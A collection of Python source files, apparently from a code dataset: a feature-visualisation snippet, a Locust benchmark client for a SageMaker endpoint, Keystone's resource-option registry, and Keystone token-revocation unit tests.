group_pool.append([g_data[:length], g_data[length:]])
'''
sample_size = 20
for i in tqdm(range(data.shape[0] // sample_size)):
l_vid = data[sample_size * i : sample_size * (i+1), :vid_length].mean(dim=1) # 5C
l_text = data[sample_size * i : sample_size * (i+1), vid_length:].mean(dim=1)
l_data = torch.cat((l_vid, l_text), dim=0).cpu().numpy()
l_data = pca.fit_transform(l_data)
l_data = tsne.fit_transform(l_data)
length = l_vid.shape[0]
large_pool = [l_data[:length], l_data[length:]]
large_pools.append(large_pool)
'''
return res, group_pool, large_pools
@ex.capture
def _silhouette(model, loss_fn, optimizer, tokenizer, dataloaders, logger,
metrics, batch_sizes, device, reg_coeff, eval_metric, model_name,
root,
epoch=-1, subset=None, key=None, eval_generate=True,
eval_set=False, sample=False, concat_group=False,
use_vist=False):
if key is None:
key = 'val'
epoch_stats = defaultdict(float)
model.eval()
dataloader = dataloaders[key]
if subset is not None:
subset = (len(dataloader) * subset) // batch_sizes[key]
subset = max(1, subset)
total_length = subset
print("starting extraction")
vids = []
texts = []
count = 0
with torch.no_grad():
for batch in tqdm(dataloader, total=subset):
batch = move_device(batch,
to=device)
vid, text = extract_reps(model, batch)
vid = torch.cat(list(vid.values()), dim=1)
vid, text = get_random_feat(vid), get_random_feat(text)
vids.append(vid)
texts.append(text)
count += vid.shape[0]
if count >= 100:
break
vids = torch.cat(vids, dim=0)[:100]
texts = torch.cat(texts, dim=0)[:100]
data = torch.cat((vids, texts), dim=0).cpu().numpy()
idx = torch.cat((torch.zeros((100,)), torch.ones((100,))), dim=0).cpu().numpy()
print(data.shape, idx.shape)
score = silhouette_score(data, idx, metric='cosine')
print(f"silhouette_score: {score}")
def get_random_feat(feat):
# (BG) LC
feat = rearrange(feat, '(b g) l c -> b (g l) c', g=5)
idx = torch.randint(0, feat.shape[1], (feat.shape[0],)).to(feat.device)
feat = feat.gather(1, idx.view(-1, 1, 1).expand(feat.shape[0], 1, feat.shape[-1]))
return feat.squeeze(1)
``` |
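The visualisation code above pools video and text token representations per group and then reduces them with PCA followed by t-SNE. A self-contained sketch of just that reduction step on random features (the sizes and perplexity here are arbitrary and smaller than in the script):
```python
import numpy as np
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE

rng = np.random.default_rng(0)
g_vid = rng.normal(size=(5, 768))    # 5 pooled video representations
g_text = rng.normal(size=(5, 768))   # 5 pooled text representations

g_data = np.concatenate((g_vid, g_text), axis=0)     # 10 x 768
g_data = PCA(n_components=10).fit_transform(g_data)  # 10 x 10
g_data = TSNE(n_components=2, perplexity=3).fit_transform(g_data)

vid_2d, text_2d = g_data[:5], g_data[5:]
print(vid_2d.shape, text_2d.shape)   # (5, 2) (5, 2)
```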
{
"source": "jiwang576/locustio",
"score": 2
} |
#### File: examples/sagemaker/sagemaker_sdk_client.py
```python
from locust import events, HttpLocust, TaskSet, task
import boto3
import logging
import os
import time
endpoint_name = "CriteoXgboostBuiltin-2018-03-22-16-57-01"
task_name = "SageMaker SDK Benchmark"
print("The botocore log level is: {}".format(logging.getLogger('botocore').level))
print("The botocore.vendored.requests.packages.urllib3.connectionpool log level is: {}".format(logging.getLogger('botocore.vendored.requests.packages.urllib3.connectionpool').level))
logging.getLogger('botocore').setLevel(logging.ERROR)
class SageMakerSdkClient(object):
def __init__(self):
self.runtime_client = boto3.client('runtime.sagemaker')
def get_time_for_prediction(self, runtime_client, endpoint_name, content_type, payload):
start_time = time.time()
response = self.runtime_client.invoke_endpoint(EndpointName=endpoint_name,
ContentType=content_type,
Body=payload)
end_time = time.time()
return (end_time - start_time) * 1000
def execute(self, name, endpoint_name, content_type, payload):
#runtime_client = boto3.client('runtime.sagemaker')
start_time = time.time()
try:
response_time = self.get_time_for_prediction(self.runtime_client, endpoint_name, content_type, payload)
events.request_success.fire(request_type="execute", name=name, response_time=response_time, response_length=0)
except Exception as e:
total_time = (time.time() - start_time) * 1000
events.request_failure.fire(request_type="execute", name=name, response_time=total_time, exception=e)
class UserTasks(TaskSet):
@task
def invocations(self):
fname = os.getcwd() + "/criteo_inference_data.csv"
with open(fname, 'rb') as f:
payload = f.read()
self.client.execute(name=task_name, endpoint_name=endpoint_name, content_type='text/csv', payload=payload)
class WebsiteUser(HttpLocust):
"""
Locust user class that does requests to the locust web server running on localhost
"""
host = "whatever. it's short circuited"
def __init__(self, *args, **kwargs):
super(WebsiteUser, self).__init__(*args, **kwargs)
self.client = SageMakerSdkClient()
min_wait = 200
max_wait = 200
task_set = UserTasks
``` |
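The client above follows the usual pattern for benchmarking a non-HTTP dependency with Locust's pre-1.0 event API: time the call yourself and fire `events.request_success` or `events.request_failure` so the stats page still aggregates it. A stripped-down version of that pattern around an arbitrary callable (the `do_call` stub and `timed_fire` helper are placeholders, not part of the original script):
```python
import time
from locust import events  # same pre-1.0 event API used above

def timed_fire(name, do_call, *args, **kwargs):
    """Run do_call and report its latency to Locust under request 'name'."""
    start_time = time.time()
    try:
        do_call(*args, **kwargs)
    except Exception as e:
        total_time = (time.time() - start_time) * 1000
        events.request_failure.fire(request_type="execute", name=name,
                                    response_time=total_time, exception=e)
    else:
        total_time = (time.time() - start_time) * 1000
        events.request_success.fire(request_type="execute", name=name,
                                    response_time=total_time, response_length=0)
```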
{
"source": "jiwanlimbu/aura",
"score": 2
} |
#### File: keystone/common/resource_options.py
```python
import six
from keystone.common import validation
from keystone.i18n import _
def _validator(value):
return
def boolean_validator(value):
if value not in (True, False):
raise TypeError(_('Expected boolean value, got %r') % type(value))
def ref_mapper_to_dict_options(ref):
"""Convert the values in _resource_option_mapper to options dict.
NOTE: this is to be called from the relevant `to_dict` methods or
similar and must be called from within the active session context.
:param ref: the DB model ref to extract options from
:returns: Dict of options as expected to be returned out of to_dict in
the `options` key.
"""
options = {}
for opt in ref._resource_option_mapper.values():
if opt.option_id in ref.resource_options_registry.option_ids:
r_opt = ref.resource_options_registry.get_option_by_id(
opt.option_id)
if r_opt is not None:
options[r_opt.option_name] = opt.option_value
return options
def resource_options_ref_to_mapper(ref, option_class):
"""Convert the _resource_options property-dict to options attr map.
The model must have the resource option mapper located in the
``_resource_option_mapper`` attribute.
The model must have the resource option registry located in the
``resource_options_registry`` attribute.
The option dict with key(opt_id), value(opt_value) will be pulled from
``ref._resource_options``.
NOTE: This function MUST be called within the active writer session
context!
:param ref: The DB model reference that is actually stored to the
backend.
:param option_class: Class that is used to store the resource option
in the DB.
"""
options = getattr(ref, '_resource_options', None)
if options is not None:
# To ensure everything is clean, no lingering refs.
delattr(ref, '_resource_options')
else:
# _resource_options didn't exist. Work from an empty set.
options = {}
# NOTE(notmorgan): explicitly use .keys() here as the attribute mapper
# has some oddities at times. This guarantees we are working with keys.
set_options = set(ref._resource_option_mapper.keys())
# Get any options that are not registered and slate them for removal from
# the DB. This will delete unregistered options.
clear_options = set_options.difference(
ref.resource_options_registry.option_ids)
options.update({x: None for x in clear_options})
# Set the resource options for user in the Attribute Mapping.
for r_opt_id, r_opt_value in options.items():
if r_opt_value is None:
# Delete any option set explicitly to None, ignore unset
# options.
ref._resource_option_mapper.pop(r_opt_id, None)
else:
# Set any options on the user_ref itself.
opt_obj = option_class(
option_id=r_opt_id,
option_value=r_opt_value)
ref._resource_option_mapper[r_opt_id] = opt_obj
class ResourceOptionRegistry(object):
def __init__(self, registry_name):
self._registered_options = {}
self._registry_type = registry_name
@property
def option_names(self):
return set([opt.option_name for opt in self.options])
@property
def options_by_name(self):
return {opt.option_name: opt
for opt in self._registered_options.values()}
@property
def options(self):
return self._registered_options.values()
@property
def option_ids(self):
return set(self._registered_options.keys())
def get_option_by_id(self, opt_id):
return self._registered_options.get(opt_id, None)
def get_option_by_name(self, name):
for option in self._registered_options.values():
if name == option.option_name:
return option
return None
@property
def json_schema(self):
schema = {'type': 'object',
'properties': {},
'additionalProperties': False}
for opt in self.options:
if opt.json_schema is not None:
# NOTE(notmorgan): All options are nullable. Null indicates
# the option should be reset and removed from the DB store.
schema['properties'][opt.option_name] = validation.nullable(
opt.json_schema)
else:
# NOTE(notmorgan): without 'type' being specified, this
# can be of any-type. We are simply specifying no interesting
# values beyond that the property may exist here.
schema['properties'][opt.option_name] = {}
return schema
def register_option(self, option):
if option in self.options:
# Re-registering the exact same option does nothing.
return
if option.option_id in self._registered_options:
raise ValueError(_('Option %(option_id)s already defined in '
'%(registry)s.') %
{'option_id': option.option_id,
'registry': self._registry_type})
if option.option_name in self.option_names:
raise ValueError(_('Option %(option_name)s already defined in '
'%(registry)s') %
{'option_name': option.option_name,
'registry': self._registry_type})
self._registered_options[option.option_id] = option
class ResourceOption(object):
def __init__(self, option_id, option_name, validator=_validator,
json_schema_validation=None):
"""The base object to define the option(s) to be stored in the DB.
:param option_id: The ID of the option. This will be used to lookup
the option value from the DB and should not be
changed once defined as the values will no longer
be correctly mapped to the keys in the user_ref when
retrieving the data from the DB.
:type option_id: str
:param option_name: The name of the option. This value will be used
to map the value from the user request on a
resource update to the correct option id to be
stored in the database. This value should not be
changed once defined as it will change the
resulting keys in the user_ref.
:type option_name: str
:param validator: A callable that raises TypeError if the value to be
persisted is incorrect. A single argument of the
value to be persisted will be passed to it. No return
value is expected.
:type validator: callable
:param json_schema_validation: Dictionary defining the JSON schema
validation for the option itself. This
is used to generate the JSON Schema
validator(s) used at the API layer
:type json_schema_validation: dict
"""
if not isinstance(option_id, six.string_types):
raise TypeError(_('`option_id` must be a string, got %r')
% option_id)
elif len(option_id) != 4:
raise ValueError(_('`option_id` must be 4 characters in '
'length. Got %r') % option_id)
if not isinstance(option_name, six.string_types):
raise TypeError(_('`option_name` must be a string. '
'Got %r') % option_name)
self._option_id = option_id
self._option_name = option_name
self.validator = validator
self._json_schema_validation = json_schema_validation
@property
def json_schema(self):
return self._json_schema_validation or None
@property
def option_name(self):
# NOTE(notmorgan) Option IDs should never be set outside of definition
# time.
return self._option_name
@property
def option_id(self):
# NOTE(notmorgan) Option IDs should never be set outside of definition
# time.
return self._option_id
```
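To see how the registry above is meant to be used: each option is registered once under a fixed four-character id, and the registry can then emit a JSON-schema fragment for API-layer validation. A usage sketch, assuming the module above is importable under its keystone path (the `1a2b` id and the option name are made up):
```python
from keystone.common.resource_options import (
    ResourceOption, ResourceOptionRegistry, boolean_validator)

registry = ResourceOptionRegistry('example')
opt = ResourceOption(option_id='1a2b',
                     option_name='multi_factor_enabled',
                     validator=boolean_validator,
                     json_schema_validation={'type': 'boolean'})
registry.register_option(opt)

print(registry.option_names)   # {'multi_factor_enabled'}
print(registry.json_schema)    # nullable boolean property for the option
opt.validator(True)            # passes
# opt.validator('yes')         # would raise TypeError
```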
#### File: tests/unit/test_revoke.py
```python
import datetime
import uuid
import mock
from oslo_utils import timeutils
from six.moves import range
from testtools import matchers
from keystone.common import utils
import keystone.conf
from keystone import exception
from keystone.models import revoke_model
from keystone.revoke.backends import sql
from keystone.tests import unit
from keystone.tests.unit import ksfixtures
from keystone.tests.unit import test_backend_sql
from keystone.token.providers import common
CONF = keystone.conf.CONF
def _future_time():
expire_delta = datetime.timedelta(seconds=1000)
future_time = timeutils.utcnow() + expire_delta
return future_time
def _past_time():
expire_delta = datetime.timedelta(days=-1000)
past_time = timeutils.utcnow() + expire_delta
return past_time
def _sample_blank_token():
issued_delta = datetime.timedelta(minutes=-2)
issued_at = timeutils.utcnow() + issued_delta
token_data = revoke_model.blank_token_data(issued_at)
return token_data
def _sample_data():
user_ids = []
project_ids = []
role_ids = []
for i in range(0, 3):
user_ids.append(uuid.uuid4().hex)
project_ids.append(uuid.uuid4().hex)
role_ids.append(uuid.uuid4().hex)
# For testing purposes, create 3 project tokens with a different user_id,
# role_id, and project_id which will be used to verify that revoking by
# grant on certain user_id, project_id, and role_id pairs leaves these
# project_tokens unrevoked if only one of the revoked columns are matched
# but not all of them as the expected behavior dictates
project_tokens = []
i = len(project_tokens)
project_tokens.append(_sample_blank_token())
project_tokens[i]['user_id'] = user_ids[1]
project_tokens[i]['project_id'] = project_ids[0]
project_tokens[i]['roles'] = [role_ids[0]]
i = len(project_tokens)
project_tokens.append(_sample_blank_token())
project_tokens[i]['user_id'] = user_ids[0]
project_tokens[i]['project_id'] = project_ids[1]
project_tokens[i]['roles'] = [role_ids[0]]
i = len(project_tokens)
project_tokens.append(_sample_blank_token())
project_tokens[i]['user_id'] = user_ids[0]
project_tokens[i]['project_id'] = project_ids[0]
project_tokens[i]['roles'] = [role_ids[1]]
return user_ids, project_ids, role_ids, project_tokens
def _matches(event, token_values):
"""See if the token matches the revocation event.
Used as a secondary check on the check-by-tree logic below: this is
a brute-force approach to checking.
Compare each attribute from the event with the corresponding
value from the token. If the event does not have a value for
the attribute, a match is still possible. If the event has a
value for the attribute, and it does not match the token, no match
is possible, so skip the remaining checks.
:param event: one revocation event to match
:param token_values: dictionary with set of values taken from the
token
:returns: True if the token matches the revocation event, indicating the
token has been revoked
"""
# The token has three attributes that can match the user_id
if event.user_id is not None:
for attribute_name in ['user_id', 'trustor_id', 'trustee_id']:
if event.user_id == token_values[attribute_name]:
break
else:
return False
# The token has two attributes that can match the domain_id
if event.domain_id is not None:
for attribute_name in ['identity_domain_id', 'assignment_domain_id']:
if event.domain_id == token_values[attribute_name]:
break
else:
return False
if event.domain_scope_id is not None:
if event.domain_scope_id != token_values['assignment_domain_id']:
return False
# If any one check does not match, the whole token does
# not match the event. The numerous `return False` statements
# indicate that the token is still valid and short-circuit the
# rest of the logic.
attribute_names = ['project_id',
'expires_at', 'trust_id', 'consumer_id',
'access_token_id', 'audit_id', 'audit_chain_id']
for attribute_name in attribute_names:
if getattr(event, attribute_name) is not None:
if (getattr(event, attribute_name) !=
token_values[attribute_name]):
return False
if event.role_id is not None:
roles = token_values['roles']
for role in roles:
if event.role_id == role:
break
else:
return False
if token_values['issued_at'] > event.issued_before:
return False
return True
class RevokeTests(object):
def _assertTokenRevoked(self, events, token_data):
backend = sql.Revoke()
if events:
self.assertTrue(revoke_model.is_revoked(events, token_data),
'Token should be revoked')
return self.assertTrue(
revoke_model.is_revoked(backend.list_events(token=token_data),
token_data), 'Token should be revoked')
def _assertTokenNotRevoked(self, events, token_data):
backend = sql.Revoke()
if events:
self.assertFalse(revoke_model.is_revoked(events, token_data),
'Token should not be revoked')
return self.assertFalse(
revoke_model.is_revoked(backend.list_events(token=token_data),
token_data), 'Token should not be revoked')
def test_list(self):
self.revoke_api.revoke_by_user(user_id=1)
self.assertEqual(1, len(self.revoke_api.list_events()))
self.revoke_api.revoke_by_user(user_id=2)
self.assertEqual(2, len(self.revoke_api.list_events()))
def test_list_since(self):
self.revoke_api.revoke_by_user(user_id=1)
self.revoke_api.revoke_by_user(user_id=2)
past = timeutils.utcnow() - datetime.timedelta(seconds=1000)
self.assertEqual(2, len(self.revoke_api.list_events(last_fetch=past)))
future = timeutils.utcnow() + datetime.timedelta(seconds=1000)
self.assertEqual(0,
len(self.revoke_api.list_events(last_fetch=future)))
def test_list_revoked_user(self):
revocation_backend = sql.Revoke()
events = []
# This simulates creating a token for a specific user. When we revoke
# the token we should have a single revocation event in the list. We
# are going to assert that the token values match the only revocation
# event in the backend.
first_token = _sample_blank_token()
first_token['user_id'] = uuid.uuid4().hex
add_event(
events, revoke_model.RevokeEvent(user_id=first_token['user_id'])
)
self.revoke_api.revoke_by_user(user_id=first_token['user_id'])
self._assertTokenRevoked(events, first_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=first_token))
)
# This simulates creating a separate token for a separate user. We are
# going to revoke the token just like we did for the previous token.
# We should have two revocation events stored in the backend but only
# one should match the values of the second token.
second_token = _sample_blank_token()
second_token['user_id'] = uuid.uuid4().hex
add_event(
events, revoke_model.RevokeEvent(user_id=second_token['user_id'])
)
self.revoke_api.revoke_by_user(user_id=second_token['user_id'])
self._assertTokenRevoked(events, second_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=second_token))
)
# This simulates creating another separate token for a separate user,
# but we're not going to issue a revocation event. Even though we have
# two revocation events persisted in the backend, neither of them
# should match the values of the third token. If they did - our
# revocation event matching would be too heavy handed, which would
# result in over-generalized revocation patterns.
third_token = _sample_blank_token()
third_token['user_id'] = uuid.uuid4().hex
self._assertTokenNotRevoked(events, third_token)
self.assertEqual(
0, len(revocation_backend.list_events(token=third_token))
)
# This gets a token but overrides the user_id of the token to be None.
# Technically this should never happen because tokens must belong to
# a user. What we're testing here is that the two revocation events
# we've created won't match None values for the user_id.
fourth_token = _sample_blank_token()
fourth_token['user_id'] = None
self._assertTokenNotRevoked(events, fourth_token)
self.assertEqual(
0, len(revocation_backend.list_events(token=fourth_token))
)
def test_list_revoked_project(self):
revocation_backend = sql.Revoke()
events = []
token = _sample_blank_token()
# Create a token for a project, revoke token, check the token we
# created has been revoked, and check the list returned a match for
# the token when passed in.
first_token = _sample_blank_token()
first_token['project_id'] = uuid.uuid4().hex
add_event(events, revoke_model.RevokeEvent(
project_id=first_token['project_id']))
revocation_backend.revoke(revoke_model.RevokeEvent(
project_id=first_token['project_id']))
self._assertTokenRevoked(events, first_token)
self.assertEqual(1, len(revocation_backend.list_events(
token=first_token)))
# Create a second token, revoke it, check the token has been revoked,
# and check the list to make sure that even though we now have 2
# revoked events in the revocation list, it will only return 1 because
# only one match for our second_token should exist
second_token = _sample_blank_token()
second_token['project_id'] = uuid.uuid4().hex
add_event(events, revoke_model.RevokeEvent(
project_id=second_token['project_id']))
revocation_backend.revoke(revoke_model.RevokeEvent(
project_id=second_token['project_id']))
self._assertTokenRevoked(events, second_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=second_token)))
# This gets a token but overrides project_id of the token to be None.
# We expect that since there are two events which both have populated
# project_ids, this should not match this third_token with any other
# event in the list so we should receive 0.
third_token = _sample_blank_token()
third_token['project_id'] = None
        self._assertTokenNotRevoked(events, third_token)
        self.assertEqual(0, len(revocation_backend.list_events(token=third_token)))
def test_list_revoked_audit(self):
revocation_backend = sql.Revoke()
events = []
# Create a token with audit_id set, revoke it, check it is revoked,
# check to make sure that list_events matches the token to the event we
# just revoked.
first_token = _sample_blank_token()
first_token['audit_id'] = common.random_urlsafe_str()
add_event(events, revoke_model.RevokeEvent(
audit_id=first_token['audit_id']))
self.revoke_api.revoke_by_audit_id(
audit_id=first_token['audit_id'])
self._assertTokenRevoked(events, first_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=first_token)))
        # Create a second token, revoke it, check it is revoked, and check that
        # list_events only finds one match: there are now two events in the
        # backend, but each has a different populated audit_id field.
second_token = _sample_blank_token()
second_token['audit_id'] = common.random_urlsafe_str()
add_event(events, revoke_model.RevokeEvent(
audit_id=second_token['audit_id']))
self.revoke_api.revoke_by_audit_id(
audit_id=second_token['audit_id'])
self._assertTokenRevoked(events, second_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=second_token)))
# Create a third token with audit_id set to None to make sure that
# since there are no events currently revoked with audit_id None this
# finds no matches
third_token = _sample_blank_token()
third_token['audit_id'] = None
self._assertTokenNotRevoked(events, third_token)
self.assertEqual(
0, len(revocation_backend.list_events(token=third_token)))
def test_list_revoked_since(self):
revocation_backend = sql.Revoke()
token = _sample_blank_token()
self.revoke_api.revoke_by_user(user_id=None)
self.revoke_api.revoke_by_user(user_id=None)
self.assertEqual(2, len(revocation_backend.list_events(token=token)))
future = timeutils.utcnow() + datetime.timedelta(seconds=1000)
token['issued_at'] = future
self.assertEqual(0, len(revocation_backend.list_events(token=token)))
def test_list_revoked_multiple_filters(self):
revocation_backend = sql.Revoke()
events = []
# create token that sets key/value filters in list_revoked
first_token = _sample_blank_token()
first_token['user_id'] = uuid.uuid4().hex
first_token['project_id'] = uuid.uuid4().hex
first_token['audit_id'] = common.random_urlsafe_str()
        # revoke the event and then verify that there is only one revocation
        # and that the only revoked event matches the token
add_event(events, revoke_model.RevokeEvent(
user_id=first_token['user_id'],
project_id=first_token['project_id'],
audit_id=first_token['audit_id']))
self.revoke_api.revoke(revoke_model.RevokeEvent(
user_id=first_token['user_id'],
project_id=first_token['project_id'],
audit_id=first_token['audit_id']))
self._assertTokenRevoked(events, first_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=first_token)))
        # If a token has None values for fields that the event has populated,
        # the event shouldn't match and the token should not be revoked
second_token = _sample_blank_token()
self._assertTokenNotRevoked(events, second_token)
self.assertEqual(
0, len(revocation_backend.list_events(token=second_token)))
        # If an event column and the corresponding token value don't match,
        # the event should not be added to the list. Demonstrated here for
        # project_id
third_token = _sample_blank_token()
third_token['project_id'] = uuid.uuid4().hex
self._assertTokenNotRevoked(events, third_token)
self.assertEqual(
0, len(revocation_backend.list_events(token=third_token)))
        # A revocation event with a null user_id and a token with a non-null
        # user_id should still return an event and revoke the token, provided
        # the other non-null event fields match the corresponding token fields
fourth_token = _sample_blank_token()
fourth_token['user_id'] = uuid.uuid4().hex
fourth_token['project_id'] = uuid.uuid4().hex
fourth_token['audit_id'] = common.random_urlsafe_str()
add_event(events, revoke_model.RevokeEvent(
project_id=fourth_token['project_id'],
audit_id=fourth_token['audit_id']))
self.revoke_api.revoke(revoke_model.RevokeEvent(
project_id=fourth_token['project_id'],
audit_id=fourth_token['audit_id']))
self._assertTokenRevoked(events, fourth_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=fourth_token)))
def _user_field_test(self, field_name):
token = _sample_blank_token()
token[field_name] = uuid.uuid4().hex
self.revoke_api.revoke_by_user(user_id=token[field_name])
self._assertTokenRevoked(None, token)
token2 = _sample_blank_token()
token2[field_name] = uuid.uuid4().hex
self._assertTokenNotRevoked(None, token2)
def test_revoke_by_user(self):
self._user_field_test('user_id')
def test_revoke_by_user_matches_trustee(self):
self._user_field_test('trustee_id')
def test_revoke_by_user_matches_trustor(self):
self._user_field_test('trustor_id')
def test_revoke_by_audit_id(self):
token = _sample_blank_token()
# Audit ID and Audit Chain ID are populated with the same value
# if the token is an original token
token['audit_id'] = uuid.uuid4().hex
token['audit_chain_id'] = token['audit_id']
self.revoke_api.revoke_by_audit_id(audit_id=token['audit_id'])
self._assertTokenRevoked(None, token)
token2 = _sample_blank_token()
token2['audit_id'] = uuid.uuid4().hex
token2['audit_chain_id'] = token2['audit_id']
self._assertTokenNotRevoked(None, token2)
def test_by_project_grant(self):
user_ids, project_ids, role_ids, project_tokens = _sample_data()
token1 = _sample_blank_token()
token1['roles'] = role_ids[0]
token1['user_id'] = user_ids[0]
token1['project_id'] = project_ids[0]
token2 = _sample_blank_token()
token2['roles'] = role_ids[1]
token2['user_id'] = user_ids[1]
token2['project_id'] = project_ids[1]
token3 = _sample_blank_token()
token3['roles'] = [role_ids[0],
role_ids[1],
role_ids[2]]
token3['user_id'] = user_ids[2]
token3['project_id'] = project_ids[2]
        # Check that no tokens are revoked at the start
self._assertTokenNotRevoked(None, token1)
self._assertTokenNotRevoked(None, token2)
self._assertTokenNotRevoked(None, token3)
for token in project_tokens:
self._assertTokenNotRevoked(None, token)
self.revoke_api.revoke_by_grant(role_id=role_ids[0],
user_id=user_ids[0],
project_id=project_ids[0])
# Only the first token should be revoked
self._assertTokenRevoked(None, token1)
self._assertTokenNotRevoked(None, token2)
self._assertTokenNotRevoked(None, token3)
for token in project_tokens:
self._assertTokenNotRevoked(None, token)
self.revoke_api.revoke_by_grant(role_id=role_ids[1],
user_id=user_ids[1],
project_id=project_ids[1])
# Tokens 1 and 2 should be revoked now
self._assertTokenRevoked(None, token1)
self._assertTokenRevoked(None, token2)
self._assertTokenNotRevoked(None, token3)
for token in project_tokens:
self._assertTokenNotRevoked(None, token)
# test that multiple roles with a single user and project get revoked
# and invalidate token3
self.revoke_api.revoke_by_grant(role_id=role_ids[0],
user_id=user_ids[2],
project_id=project_ids[2])
self.revoke_api.revoke_by_grant(role_id=role_ids[1],
user_id=user_ids[2],
project_id=project_ids[2])
self.revoke_api.revoke_by_grant(role_id=role_ids[2],
user_id=user_ids[2],
project_id=project_ids[2])
# Tokens 1, 2, and 3 should now be revoked leaving project_tokens
# unrevoked.
self._assertTokenRevoked(None, token1)
self._assertTokenRevoked(None, token2)
self._assertTokenRevoked(None, token3)
for token in project_tokens:
self._assertTokenNotRevoked(None, token)
@mock.patch.object(timeutils, 'utcnow')
def test_expired_events_are_removed(self, mock_utcnow):
def _sample_token_values():
token = _sample_blank_token()
token['expires_at'] = utils.isotime(_future_time(),
subsecond=True)
return token
now = datetime.datetime.utcnow()
now_plus_2h = now + datetime.timedelta(hours=2)
mock_utcnow.return_value = now
# Build a token and validate it. This will seed the cache for the
# future 'synchronize' call.
token_values = _sample_token_values()
audit_chain_id = uuid.uuid4().hex
self.revoke_api.revoke_by_audit_chain_id(audit_chain_id)
token_values['audit_chain_id'] = audit_chain_id
self.assertRaises(exception.TokenNotFound,
self.revoke_api.check_token,
token_values)
# Move our clock forward by 2h, build a new token and validate it.
# 'synchronize' should now be exercised and remove old expired events
mock_utcnow.return_value = now_plus_2h
self.revoke_api.revoke_by_audit_chain_id(audit_chain_id)
        # two hours later, it should still not be found
self.assertRaises(exception.TokenNotFound,
self.revoke_api.check_token,
token_values)
def test_delete_group_without_role_does_not_revoke_users(self):
revocation_backend = sql.Revoke()
domain = unit.new_domain_ref()
self.resource_api.create_domain(domain['id'], domain)
        # Create two groups. Group1 is used to show that deleting a group with
        # no role assignments and no users does not create revocation events.
        # Group2 shows that deleting a group that has a role assignment and
        # users in it does create revocation events
group1 = unit.new_group_ref(domain_id=domain['id'])
group1 = self.identity_api.create_group(group1)
group2 = unit.new_group_ref(domain_id=domain['id'])
group2 = self.identity_api.create_group(group2)
role = unit.new_role_ref()
self.role_api.create_role(role['id'], role)
user1 = unit.new_user_ref(domain_id=domain['id'])
user1 = self.identity_api.create_user(user1)
user2 = unit.new_user_ref(domain_id=domain['id'])
user2 = self.identity_api.create_user(user2)
        # Add two users to the group, verify they are added, delete the group,
        # and check that no revocation events have been created
self.identity_api.add_user_to_group(user_id=user1['id'],
group_id=group1['id'])
self.identity_api.add_user_to_group(user_id=user2['id'],
group_id=group1['id'])
self.assertEqual(
2, len(self.identity_api.list_users_in_group(group1['id'])))
self.identity_api.delete_group(group1['id'])
self.assertEqual(0, len(revocation_backend.list_events()))
# Assign a role to the group, add two users to the group, verify that
# the role has been assigned to the group, verify the users have been
# added to the group, delete the group, check that the revocation
# events have been created
self.assignment_api.create_grant(group_id=group2['id'],
domain_id=domain['id'],
role_id=role['id'])
grants = self.assignment_api.list_role_assignments(role_id=role['id'])
self.assertThat(grants, matchers.HasLength(1))
self.identity_api.add_user_to_group(user_id=user1['id'],
group_id=group2['id'])
self.identity_api.add_user_to_group(user_id=user2['id'],
group_id=group2['id'])
self.assertEqual(
2, len(self.identity_api.list_users_in_group(group2['id'])))
self.identity_api.delete_group(group2['id'])
self.assertEqual(2, len(revocation_backend.list_events()))
class UUIDSqlRevokeTests(test_backend_sql.SqlTests, RevokeTests):
def config_overrides(self):
super(UUIDSqlRevokeTests, self).config_overrides()
self.config_fixture.config(
group='token',
provider='uuid',
revoke_by_id=False)
class FernetSqlRevokeTests(test_backend_sql.SqlTests, RevokeTests):
def config_overrides(self):
super(FernetSqlRevokeTests, self).config_overrides()
self.config_fixture.config(
group='token',
provider='fernet',
revoke_by_id=False)
self.useFixture(
ksfixtures.KeyRepository(
self.config_fixture,
'fernet_tokens',
CONF.fernet_tokens.max_active_keys
)
)
def add_event(events, event):
events.append(event)
return event
def remove_event(events, event):
for target in events:
if target == event:
events.remove(target)
class RevokeListTests(unit.TestCase):
def setUp(self):
super(RevokeListTests, self).setUp()
self.events = []
self.revoke_events = list()
def _assertTokenRevoked(self, token_data):
self.assertTrue(any([_matches(e, token_data) for e in self.events]))
return self.assertTrue(
revoke_model.is_revoked(self.revoke_events, token_data),
'Token should be revoked')
def _assertTokenNotRevoked(self, token_data):
self.assertFalse(any([_matches(e, token_data) for e in self.events]))
return self.assertFalse(
revoke_model.is_revoked(self.revoke_events, token_data),
'Token should not be revoked')
def _revoke_by_user(self, user_id):
return add_event(
self.revoke_events,
revoke_model.RevokeEvent(user_id=user_id))
def _revoke_by_audit_chain_id(self, audit_chain_id, project_id=None,
domain_id=None):
event = add_event(
self.revoke_events,
revoke_model.RevokeEvent(audit_chain_id=audit_chain_id,
project_id=project_id,
domain_id=domain_id)
)
self.events.append(event)
return event
def _revoke_by_expiration(self, user_id, expires_at, project_id=None,
domain_id=None):
event = add_event(
self.revoke_events,
revoke_model.RevokeEvent(user_id=user_id,
expires_at=expires_at,
project_id=project_id,
domain_id=domain_id))
self.events.append(event)
return event
def _revoke_by_user_and_project(self, user_id, project_id):
event = add_event(self.revoke_events,
revoke_model.RevokeEvent(project_id=project_id,
user_id=user_id))
self.events.append(event)
return event
def _revoke_by_project_role_assignment(self, project_id, role_id):
event = add_event(self.revoke_events,
revoke_model.RevokeEvent(project_id=project_id,
role_id=role_id))
self.events.append(event)
return event
def _revoke_by_domain_role_assignment(self, domain_id, role_id):
event = add_event(self.revoke_events,
revoke_model.RevokeEvent(domain_id=domain_id,
role_id=role_id))
self.events.append(event)
return event
def _revoke_by_domain(self, domain_id):
event = add_event(self.revoke_events,
revoke_model.RevokeEvent(domain_id=domain_id))
self.events.append(event)
def test_revoke_by_audit_chain_id(self):
audit_id = common.build_audit_info(parent_audit_id=None)[0]
token_data_1 = _sample_blank_token()
# Audit ID and Audit Chain ID are populated with the same value
# if the token is an original token
token_data_1['audit_id'] = audit_id
token_data_1['audit_chain_id'] = audit_id
event = self._revoke_by_audit_chain_id(audit_id)
self._assertTokenRevoked(token_data_1)
audit_id_2 = common.build_audit_info(parent_audit_id=audit_id)[0]
token_data_2 = _sample_blank_token()
token_data_2['audit_id'] = audit_id_2
token_data_2['audit_chain_id'] = audit_id
self._assertTokenRevoked(token_data_2)
self.remove_event(event)
self._assertTokenNotRevoked(token_data_1)
